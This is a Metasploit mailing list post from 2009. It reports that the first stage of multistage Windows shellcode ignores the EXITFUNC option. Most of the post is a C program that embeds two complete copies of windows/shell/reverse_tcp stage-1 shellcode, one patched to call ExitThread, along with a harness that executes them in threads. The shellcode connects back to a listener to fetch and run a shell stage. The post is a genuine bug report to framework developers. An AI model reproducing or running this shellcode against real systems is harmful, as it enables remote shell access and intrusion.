Metasploit mailing list archives
Shellcodes first stage ignores EXITFUNC
From: Amin <amin () zitune ch>
Date: Thu, 31 Dec 2009 13:57:03 +0100
Hi Everybody,First of all: thank ALL of you for metasploit and for keeping it improving! Its a joy to work with :-) !
Now my problem: the first stage of multistage windows shellcodes does not consider the EXITFUNC option. This has an impact in connect-back shellcodes, where the ReverseConnectRetries option is set to a number less then 255 (finite number of retries). After failing to connect to the attacker, the stage exits.
By looking at the this first stage of the shellcode we always find an ExitProcess call instead of the one specified with EXITFUNC.
Regards, Amin A short example: ------------- example.cpp ------------- #include <stdio.h> #include <windows.h> /* * windows/shell/reverse_tcp - 290 bytes (stage 1) * http://www.metasploit.com * EXITFUNC=thread, LPORT=4444, ReverseConnectRetries=5, * LHOST=127.0.0.1 */ unsigned char buf[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30" "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2" "\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3" "\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58" "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff" "\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68" "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01" "\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50" "\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a" "\x05\x68\x7f\x00\x00\x01\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10" "\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e" "\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56" "\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10" "\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a" "\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6" "\x85\xf6\x75\xec\xc3"; /* * modified: * Replace ExitProcess (0x56A2B5F0) with ExitThread (0x0A2A1DE0) */ unsigned char buf_modified[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30" "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2" "\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3" "\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58" "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff" "\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68" "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01" "\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50" "\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a" "\x05\x68\x7f\x00\x00\x01\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10" "\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e" "\x08\x75\xec\x68" "\xe0\x1d\x2a\x0a" // ExitThread "\xff\xd5\x6a\x00\x6a\x04\x56" "\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10" "\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a" "\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6" "\x85\xf6\x75\xec\xc3"; int main(int argc, char *argv[]) { void (*payfun)(); HANDLE hThread; // Modified shellcode payfun = *(void (__cdecl *)(void))&buf_modified;hThread = CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)payfun,NULL,0,NULL);
WaitForSingleObject(hThread, INFINITE); printf("-[[ Modified shellcode exited\n"); fflush(stdout); // Original shellcode payfun = *(void (__cdecl *)(void))&buf;hThread = CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)payfun,NULL,0,NULL);
WaitForSingleObject(hThread, INFINITE); printf("-[[ Original shellcode exited\n"); fflush(stdout); return 0; } ----------------- EoF ----------------- Output: $ example.exe -[[ Modified shellcode exited $ _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Shellcodes first stage ignores EXITFUNC Amin (Dec 31)
- Re: Shellcodes first stage ignores EXITFUNC HD Moore (Dec 31)
- Re: Shellcodes first stage ignores EXITFUNC Amin (Dec 31)
- Re: Shellcodes first stage ignores EXITFUNC HD Moore (Dec 31)